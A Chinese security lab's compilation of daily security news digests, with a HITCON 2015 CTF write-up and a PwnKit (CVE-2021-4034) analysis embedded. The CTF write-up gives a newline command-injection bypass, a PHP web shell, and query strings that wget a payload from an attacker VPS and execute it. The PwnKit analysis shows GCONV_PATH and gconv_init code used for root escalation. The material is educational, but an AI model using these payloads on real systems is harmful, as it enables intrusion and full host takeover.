免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Deadbolt 勒索软件针对 ASUSTOR 和QNap NAS 设备 https://thehackernews.com/2022/02/warning-deadbolt-ransomware-targeting.html 2、 Cisco Nexus 交换机存在 DoS 漏洞 https://www.securityweek.com/nsa-informs-cisco-vulnerability-exposing-nexus-switches-dos-attacks 3、大规模网络钓鱼活动针对花旗银行客户 https://www.bleepingcomputer.com/news/security/citibank-phishing-baits-customers-with-fake-suspension-alerts/ 4、乌克兰政府机构和银行网站再次遭受 DDoS 攻击 https://www.bleepingcomputer.com/news/security/ukrainian-government-and-banks-once-again-hit-by-ddos-attacks/ 5、Sandworm黑客组织利用Cyclops Blink恶意软件攻击防火墙设备 https://www.zdnet.com/article/security-warning-hackers-are-using-this-new-malware-to-target-firewall-appliances/ 6、Dridex恶意软件在被黑电脑上部署Entropy勒索软件 https://thehackernews.com/2022/02/dridex-malware-deploying-entropy.html 7、Horde网络邮件客户端的XSS漏洞可通过文件预览功能触发 https://portswigger.net/daily-swig/zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function 8、华硕子公司ASUSTOR遭勒索攻击，被索要上千万元赎金 https://www.freebuf.com/news/323073.html 9、NVIDIA RTX 30显卡挖矿被100％破解？其实是恶意软件 http://www.cnbeta.com/articles/tech/1240357.htm 10、谷歌浏览器允许用户在保存的密码中添加注释 https://www.bleepingcomputer.com/news/google/google-chrome-to-allow-users-to-add-notes-to-saved-passwords/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、中国研究员披露美国NSA方程式的顶级后门Bvp47技术细节 https://www.pangulab.cn/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group 2、Sophos 将 Entropy 勒索软件与 Dridex 恶意软件相关联 https://securityaffairs.co/wordpress/128323/cyber-crime/entropy-ransomware-dridex-link.html 3、Horde Webmail 软件中被发现了一个存在 9 年之久的未修补漏洞 https://securityaffairs.co/wordpress/128314/hacking/horde-webmail-xss.html 4、Kostovite、Petrovite 和 Erythrite 黑客组织正在攻击工业、OT系统 https://www.zdnet.com/article/these-new-hacking-groups-are-striking-industrial-operational-tech-targets/ 5、加密缺陷影响超过1亿部三星手机可能受到初始向量重用攻击 https://threatpost.com/samsung-shattered-encryption-on-100m-phones/178606/ 6、CryptBot 的新变种针对所有 Chrome 版本 https://cyware.com/news/new-variant-of-cryptbot-targets-all-chrome-versions-ff58a9f5 7、研究人员使用 Find My Protocol 绕过 Apple Airtags 克隆的跟踪保护 https://www.theregister.com/2022/02/22/apple_airtags_protections_bypass/ 8、研究人员在NPM包存储库中发现25个恶意JavaScript库 https://thehackernews.com/2022/02/25-malicious-javascript-libraries.html 9、研究人员揭示了利用VNC屏幕共享软件绕过MFA的方法 https://www.bleepingcomputer.com/news/security/devious-phishing-method-bypasses-mfa-using-remote-access-software/ 10、加密货币交易平台Coinbase因存在漏洞短暂停止了其服务 https://www.govinfosecurity.com/market-nuking-coinbase-api-bug-halted-new-trading-orders-a-18582

前言 对于Web方向的选手来说，拥有一台vps可以快速解决一些RCE问题，本篇文章所演示的是2015年HITCON的一道web题，虽然时隔有些久，但是这题所利用的trick以及RCE的思路，仍然值得我们去学习。 初步审计 题目代码如下： <?php    highlight_file(__FILE__);    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];    if ( !file_exists($dir) )        mkdir($dir);    chdir($dir);    $args = $_GET['args'];    for ( $i=0; $i<count($args); $i++ ){        if ( !preg_match('/^\w+$/', $args[$i]) )            exit();   }    exec("/bin/orange " . implode(" ", $args)); ?> 题目代码比较短，一共就15行代码，但实际上最关键的代码就只有两行，如下： if ( !preg_match('/^\w+$/', $args[$i]) ) exec("/bin/orange " . implode(" ", $args)); 一个是正则匹配，一个是exec的命令执行 首先先看正则部分/^\w+$/，这一部分要求传入的args参数必须以字母数字下划线开头，除此之外，在最后还有一个美元符号$，需要明确的是：$符号在PCRE中是会匹配\n以及\r前的位置的，结合后面exec命令执行的部分，也就是说，我们可以使用换行符%0a绕过执行其他命令。 但是如果本题在正则表达式后加一个D修饰符，那么就无法使用%0a绕过，具体测试样例如下，这里就不过多阐述了，因为题目中没有这个修饰符。 echo preg_match("/^\w+$/", "abc".chr(10));//1 echo preg_match("/^\w+$/D", "abc".chr(10));//0 其次再粗略看一下命令执行的部分，这里命令执行的部分使用exec，单单使用一个exec是无法将命令执行的结果回显出来，因此在后续做题就可能会产生这么几种思路：数据外带、写入shell等等 数据外带 首先分析一下数据外带，多数情况下想要尝试数据外带都需要使用一些特殊的字符，例如使用反引号外带至dnslog，不过本题正则不允许args传入，因此数据外带这个方法行不通 写入shell 想要使用写入shell方法完成本题，还是有两种方式，一种方式就是使用echo 'xxx' > xx.php，然而这题正则过滤了这些字符，因此可以使用另一种方法，就是将下载远程服务器上的文件，通过一些操作进行RCE 详解RCE 本题官方解所使用的思路就是：下载远程服务器上的文件，通过一些操作进行RCE，具体是哪些操作下面会说到。 首先我们现在本地服务器上测试，此时新建一个php文件，命名为1.php，内容如下： <?php echo 3 * 4; echo "\n"; ?> 然后将1.php放入一个文件夹a中 这个时候我们将文件夹a利用tar打包，注意是打包，不是压缩 tar cf b a 将文件夹a打包，并且生成b 打包之后结果如下： 此时我们直接使用php命令去执行这个b 看一下最后的12，就是前面1.php的执行结果3 * 4 = 12 那么为什么可以直接执行b这个文件呢？ 其实我们可以直接使用cat查看b中的文件 可以看到，b文件中存在之前写入的1.php的代码 这个时候我们总结一下这个方法，全程使用的命令对于正则/^\w+$/都是合法的，并且1.php中的内容可控，因此可以通过这个方法写入shell 因此，对于解题来说，解题流程如下： 首先在vps中新建一个index.html，文件内容如下： <?php file_put_contents('shell.php', '    <?php    header("Content-Type: text/plain");    print shell_exec($_GET["cmd"]);    ?> '); ?> 然后在vps中启动http服务 python3 -m http.server 80 由于ip都是6.6.6.6的形式，带.，不符合正则，因此可以使用十进制ip绕过 <?php echo ip2long("6.6.6.6"); ?> //101058054 然后先新建一个upload目录，对应上面测试的a ?args[]=l%0a&args[]=mkdir&args[]=upload 然后进入upload目录，利用wget下载vps上的index.html ?args[]=l%0a&args[]=cd&args[]=upload%0a&args[]=wget&args[]=101058054 //注意：最后一个args为vps十进制ip值 将upload目录打包，打包后的名称为b ?args[]=l%0a&args[]=tar&args[]=cvf&args[]=b&args[]=upload //将upload目录打包为b 在执行b目录，写入shell ?args[]=l%0a&args[]=php&args[]=b //执行b，写入shell 这题本质上是利用了tar打包的特性，将下载下来的index.html打包，然后利用php执行 不过这只是官方解，除此之外，在2015年比赛的时候，还有一些队伍使用http302重定向到ftp中，将恶意文件下载到靶机中getshell。 由于Python自带的http.server默认将index.html作为首页，并且无法修改默认首页 但是，还有一种方法就是自建一个web服务器，不使用php解析，且访问80端口的默认文档为shell.php，然后再利用wget下载php文件进行getshell。 总之，方法总比困难多。 参考文章 http://drops.xmd5.com/static/drops/web-9845.html https://github.com/p4-team/ctf/tree/master/2015-10-18-hitcon/web_100_babyfirst

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、物流巨头 Expeditors International遭勒索攻击导致全球运营系统中断 https://www.securityweek.com/cyberattack-hits-global-operations-logistics-giant-expeditors-international 2、炊具巨头 Meyer Corporation 披露网络攻击和数据泄露 https://securityaffairs.co/wordpress/128289/malware/meyer-corporation-discloses-data-breach.html 3、2021 年 91% 的英国组织遭到电子邮件网络钓鱼攻击 https://www.infosecurity-magazine.com/news/uk-organizations-email-phishing/ 4、新版本的CryptBot恶意软件通过盗版软件网站传播 https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/ 5、黑客针对Microsoft SQL服务器部署Cobalt Strike Beacon https://thehackernews.com/2022/02/hackers-backdoor-unpatched-microsoft.html 6、《日本东京奥运会网络安全报告》官网瘫痪1小时，共遭4.5亿次网络攻击 https://mp.weixin.qq.com/s/Sar-NeGK7jyh-mWTwMrUGQ 7、谷歌实验室称Linux开发者修复安全漏洞的速度最快 https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html 8、攻击者通过NFT话题分发木马BitRAT https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat 9、豆瓣被爆APP内截图生成盲水印含个人敏感信息，回应称系新功能 https://www.cnbeta.com/articles/tech/1239027.htm 10、工信部部署做好工业领域数据安全管理试点工作 https://mp.weixin.qq.com/s/u5qtJkkTpDgW2UnnBldHXQ

前言 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞，该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 pkexec Polkit（以前称为 PolicyKit）是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令，使用命令 pkexec 后跟要执行的命令（具有 root 权限）。 运行   完成认证即可使用root权限执行文件   漏洞复现   漏洞分析 变量n初始值被设置为1，循环执行的次数为参数的个数，但是若参数个数为0时，此时变量n仍然为1，并且后面执行的语句会将argv[n]的值取出则造成了数组越界。   test1.c int main(int argc,char **argv) { printf("argc:%d\n",argc); for(int i=0;i<argc;i++) printf("argv[%d]:%s\n",i,argv[i]); return 0; } 将test.c编译执行，发现argv[0]为执行文件所在路径。并且参数个数也是为1，不会出现为0的情况。因此在这种情况下pkexec不会出现数组越界的情况。   test2.c #include <unistd.h> int main() { char * const args[] = {NULL}; char * const environ[] = {NULL}; execve("./test",args,environ); return 0; } 将test2.c编译执行，使用execve函数启动test1文件，发现此时的argc为0。   那么使用execve函数调用pkexec文件就有可能会出现argc为0，造成数组越界，下图为调试pkexec时的情况，此时的argc为0,但是n为1，通过源码可以看到后续会读取argv[n]的值，因此造成了数组越界。   漏洞利用 pkexec文件会执行validate_environment_variable (key, value)用于检测key所对应的环境变量是否合法。   若key所对应的环境变量不合法则会采用g_printerr函数打印信息，log_message函数内部也是调用了g_printerr进行信息的打印。   exp利用g_printerr打印错误信息时特殊的执行流程进行getshell。 当Linux中CHARSET不是设置为UTF-8格式，则会调用iconv，用于将文本从一种编码转化为另一种编码。 在调用iconv之前需要通过使用iconv_open分配转化描述符号。 iconv_open函数受到GCONV_PATH环境变量影响 • 若GCONV_PATH未设置，那么iconv_open会加载系统默认的模块配置的缓存文件。 – 默认的配置文件位于/usr/lib/gconv/gconv-modules • 若GCONV_PATH被设置，则会优先加载设置路径下的配置文件。 查看默认的配置文件信息gconv-modules，该配置文件指定了编码转换的键值对，并且通过指定的so文件执行转换。   main_g_printerr.c文件中调用了g_printerr函数，而test3.c则是我们稍后需要编译成.so的文件，尝试利用g_printerr函数执行自行编译的so库。 //main_g_printerr.c int main() { g_printerr("Hello World!\n"); return 0; } //test3.c #include<stdlib.h> #include<stdio.h> #include<unistd.h> void gconv() { } void gconv_init(void *step) { printf("Hello test3\n"); exit(0); } //配置文件 gconv-modules //将编码为ABCD转化为UTF-8，具体转化流程根据test3.so文件 module UTF-8// ABCD// test3 1 将main_g_printerr.c编译为main_g_printerr，test3.c编译为test3.so，gconv-modules为配置文件，内容如上。   设置CHARSET为ABCD,因为配置文件写的是从ABCD转化为UTF-8，然后将环境变量GCONV_PATH设置为当前目录。执行main_g_printerr发现输出的是.so文件中的Hello test3   pkexec是具有suid特殊权限的文件，因此执行pkexec文件时是具有root权限的。   linux的动态链接器会在特权程序执行的时候清楚危险的环境变量，因此使用execve启动pkexec时，即使设置了GCONV_PATH也会被连接器清除。如下图所示test4具有suid权限，在test5中使用execve启动test4，并且设置了GCONV_PATH环境变量，但是可以看到test4的环境变量中并没有GCONV_PATH   因此需要使用pkexec中存在的数组越界漏洞，将GCONV_PATH写入 变量argv与变量envp在内存中是连续的，如下图所示，图片来自于https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034   当我们使用execve启动pkexec时，argv是NULL，因此argc的值为0，但是pkexec会默认将argc的值赋值为1，因此argv[argc] = argv[1] = envp[0]，因此envp中的值会被越界读取。 利用数组越界写入GCONV_PATH=. 使用execve启动pkexec时envp[0]的值为FileName:.，并在当前目录下新建名为GCONV_PATH=.的文件夹，该文件夹下新建名为FileName:.的文件。 首先pkexec会取出argv[1](即envp[0])的值，接着通过g_find_program_in_path函数获取文件路径从而构造出GCONV_PATH=.FileName:.，接着该值会重新覆盖envp[0]，至此GCONV_PATH被成功写入。   GDB调试 数组越界读   环境变量构造   成功引入环境变量   最后就是使得pkexec使用g_printerr打印错误信息即可。 参考文章 https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034https://bbs.pediy.com/thread-271423.htmhttps://github.com/berdav/CVE-2021-4034https://man7.org/linux/man-pages/man1/iconv.1.htmlhttps://xz.aliy

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员找到了一种解密 Hive 勒索软件加密数据的方法 https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data 2、 Xenomorph银行木马通过Google Play分发，针对 56 家欧洲银行 https://securityaffairs.co/wordpress/128253/malware/xenomorph-android-banking-trojan.html 3、SMS PVA 服务被滥用以绕过 SMS 验证机制 https://securityaffairs.co/wordpress/128242/cyber-crime/sms-pva-services.html 4、伊朗国家广播公司 IRIB 被破坏性 Wiper 恶意软件攻击 https://thehackernews.com/2022/02/iranian-state-broadcaster-irib-hits-by_21.html 5、微软警告Web3和去中心化网络上的冰式网络钓鱼威胁 https://thehackernews.com/2022/02/microsoft-warns-of-ice-phishing-threat.html 6、研究表明开源软件包中的漏洞通常需要很长时间才能修复 https://portswigger.net/daily-swig/lagging-behind-new-study-highlights-weaknesses-in-open-source-patch-process 7、CISA发布用于业务保护的免费安全工具清单 https://www.theregister.com/2022/02/18/cisa_free_security/ 8、针对乌克兰组织的DDoS攻击被归咎于俄罗斯情报部门 https://www.infosecurity-magazine.com/news/russia-prepositioning-attacks/ 9、攻击者仿冒NFT市场OpenSea向其用户发送钓鱼邮件 https://www.zdnet.com/article/opensea-scam-artists-swindle-nfts-worth-millions-in-phishing-attack/ 10、新的网络钓鱼活动针对Monzo网上银行用户 https://www.bleepingcomputer.com/news/security/new-phishing-campaign-targets-monzo-online-banking-customers/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、英特尔发布软件和固件更新补丁修复了18个高危漏洞 https://www.securityweek.com/intel-software-and-firmware-updates-patch-18-high-severity-vulnerabilities 2、VMware NSX Data Center高危漏洞可能使虚拟机受到攻击 https://www.securityweek.com/vmware-nsx-data-center-flaw-can-expose-virtual-systems-attacks 3、Trickbot 操作现在由 Conti 勒索软件控制 https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html 4、UpdraftPlus 插件修复了一个高危漏洞，影响300万个站点 https://securityaffairs.co/wordpress/128170/hacking/updraftplus-forced-update.html 5、Snap包管理中发现新的 Linux 权限提升漏洞 https://securityaffairs.co/wordpress/128150/hacking/cve-2021-44731-linux-privilege-escalation.html 6、伊朗黑客利用Log4j漏洞针对VMware Horizon 部署勒索软件 https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html 7、攻击者利用Microsoft Teams传播恶意软件 https://securityaffairs.co/wordpress/128136/hacking/microsoft-teams-attack-vector.html 8、研究揭示了一种新型抗攻击量子密钥分发网络的可行性 https://www.csoonline.com/article/3650748/new-quantum-key-distribution-network-resistant-to-quantum-attacks.html 9、SonicWall在2021年检测到超过6.2亿次勒索软件攻击 https://www.infosecurity-magazine.com/news/over-620-million-ransomware/ 10、开源监控软件Zabbix中的两个漏洞允许攻击者绕过身份验证 https://portswigger.net/daily-swig/critical-vulnerabilities-in-zabbix-web-frontend-allow-authentication-bypass-code-execution-on-servers

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、攻击者利用 Microsoft Teams 传播恶意软件 https://securityaffairs.co/wordpress/128136/hacking/microsoft-teams-attack-vector.html 2、特制电子邮件可能使 Cisco ESA 设备崩溃 https://securityaffairs.co/wordpress/128131/hacking/cisco-esa-dos.html 3、欧洲数据保护监督机构呼吁禁止像 Pegasus 这样的间谍软件 https://securityaffairs.co/wordpress/128123/security/edps-surveillance-spyware-pegasus.html 4、攻击者利用 Zoho 漏洞入侵了红十字国际委员会 https://securityaffairs.co/wordpress/128110/hacking/nation-state-actors-hacked-red-cross-exploiting-a-zoho-bug.html 5、Trickbot 针对 60 家知名公司的客户 https://securityaffairs.co/wordpress/128087/malware/trickbot-targets-60-high-profile-companies.html 6、谷歌将隐私沙盒引入 Android 以限制用户数据的共享 https://thehackernews.com/2022/02/google-bringing-privacy-sandbox-to.html 7、Moses Staff黑客组织针对以色列进行网络间谍活动 https://thehackernews.com/2022/02/moses-staff-hackers-targeting-israeli.html 8、研究人员发现了基于Golang的新僵尸网络Kraken https://securityaffairs.co/wordpress/128116/malware/golang-kraken-botnet.html 9、印度储备银行副行长呼吁禁止加密货币 https://www.theregister.com/2022/02/16/india_cryptocurrency_ban_call/ 10、乌克兰：军事防御机构和银行正受到网络攻击 https://securityaffairs.co/wordpress/128051/hacking/ukraine-military-agencies-banks-hit-by-ddos-attacks-defacements.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、向日葵个人版for Windows存在高危命令执行漏洞 https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 2、专家披露 Apache Cassandra DB RCE 的细节 https://securityaffairs.co/wordpress/128079/breaking-news/apache-cassandra-rce.html 3、VMware修复了4个在天府杯黑客大赛中披露的高危漏洞 https://securityaffairs.co/wordpress/128063/security/vmware-fixes-flaws-demonstrated-at-chinese-tianfu-cup-hacking-contest.html 4、BlackCat 团伙声称对 Swissport 勒索软件攻击负责 https://securityaffairs.co/wordpress/128039/cyber-crime/blackcat-swissport-ransomware-attack.html 5、研究人员披露了TA2541组织的一系列网络间谍活动 https://threatpost.com/ta2541-apt-rats-aviation/178422/ 6、研究人员展示了如何恢复使用像素化技术编辑过的文本 https://portswigger.net/daily-swig/new-tool-can-uncover-redacted-pixelated-text-to-reveal-sensitive-data 7、FritzFrog 僵尸网络疯狂扩张，近四成受害者在中国 https://www.freebuf.com/articles/network/321848.html 8、西班牙警方逮捕SIM卡金融欺诈犯罪团伙 https://thehackernews.com/2022/02/spanish-police-arrest-sim-swappers-who.html 9、FBI称BlackByte勒索软件入侵了3个美国关键基础设施组织 https://securityaffairs.co/wordpress/128013/malware/blackbyte-ransomware-breached-at-least-3-us-critical-infrastructure-organizations.html 10、新的MyloBot恶意软件变体发送勒索邮件 https://thehackernews.com/2022/02/new-mylobot-malware-variant-sends.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Chrome更新修复了2022年的第一个0day漏洞 https://threatpost.com/google-chrome-zero-day-under-attack/178428/ 2、乌克兰国防机构和两家国有银行遭DDoS攻击 https://securityaffairs.co/wordpress/128051/hacking/ukraine-military-agencies-banks-hit-by-ddos-attacks-defacements.html 3、虚假微软网站声称提供Windows 11以传播恶意软件 https://www.hackread.com/fake-windows-website-redline-malware-windows-11/ 4、黑客利用BGP劫持从韩国加密货币平台KLAYswap窃取约190万美元 https://therecord.media/klayswap-crypto-users-lose-funds-after-bgp-hijack/ 5、Grafana被发现存在跨站请求伪造漏洞 https://portswigger.net/daily-swig/grafana-web-security-vulnerability-opened-a-plethora-of-attack-possibilities 6、国际互联网协会由于配置错误泄露了超8万名成员的个人数据 https://portswigger.net/daily-swig/internet-society-data-leak-exposed-80-000-members-login-details 7、体育品牌美津浓遭勒索软件攻击致订单延期 https://www.freebuf.com/news/321945.html 8、修订后的《网络安全审查办法》2月14日起施行 https://www.ithome.com/0/602/836.htm 9、知乎声明：未使用“行为感知系统”监测员工 https://tech.ifeng.com/c/8DcyZPCVDn5 10、严重 Magento 零日漏洞 CVE-2022-24086 被积极利用 https://securityaffairs.co/wordpress/127999/hacking/cve-2022-24086-zero-day.html